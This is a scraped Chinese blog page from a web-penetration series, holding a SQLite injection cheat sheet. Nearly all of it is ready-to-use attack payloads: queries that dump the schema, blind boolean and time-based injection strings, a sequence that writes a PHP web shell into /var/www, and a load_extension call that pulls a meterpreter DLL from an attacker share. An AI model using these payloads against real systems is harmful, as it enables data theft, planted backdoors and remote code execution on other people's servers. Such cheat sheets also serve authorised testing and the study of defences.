WEB渗透Web突破篇-SQL注入(数据库判断)-CSDN博客
WEB渗透Web突破篇-SQL注入(MYSQL)-CSDN博客
WEB渗透Web突破篇-SQL注入(MSSQL)-CSDN博客
WEB渗透Web突破篇-SQL注入(Oracle)-CSDN博客
WEB渗透Web突破篇-SQL注入(PostgreSQL)-CSDN博客
WEB渗透Web突破篇-SQL注入(SQLite)-CSDN博客
WEB渗透Web突破篇-SQL注入(DB2)-CSDN博客
WEB渗透Web突破篇-SQL注入(SQLMAP)-CSDN博客
注释符
版本
字符型注入 - 获取数据库结构
- SELECT sql FROM sqlite_schema
- SELECT tbl_name FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'
- 使用limit X+1 offset X,提取所有表
- SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='table_name'
- SELECT replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(substr((substr(sql,instr(sql,'(')%2b1)),instr((substr(sql,instr(sql,'(')%2b1)),'')),"TEXT",''),"INTEGER",''),"AUTOINCREMENT",''),"PRIMARY KEY",''),"UNIQUE",''),"NUMERIC",''),"REAL",''),"BLOB",''),"NOT NULL",''),",",'~~') FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name NOT LIKE 'sqlite_%' AND name ='table_name'
- and (SELECT count(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' ) < number_of_table
- and (SELECT length(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name not like 'sqlite_%' limit 1 offset 0)=table_name_length_number
- and (SELECT hex(substr(tbl_name,1,1)) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' limit 1 offset 0) > hex('some_char')
- AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))
- ATTACH DATABASE '/var/www/lol.php' AS lol;
- CREATE TABLE lol.pwn (dataz text);
- INSERT INTO lol.pwn (dataz) VALUES ("<?php system($_GET['cmd']); ?>");--
- UNION SELECT 1,load_extension('\\evilhost\evilshare\meterpreter.dll','DllMain');--
- 默认情况下,此组件是禁用的
|
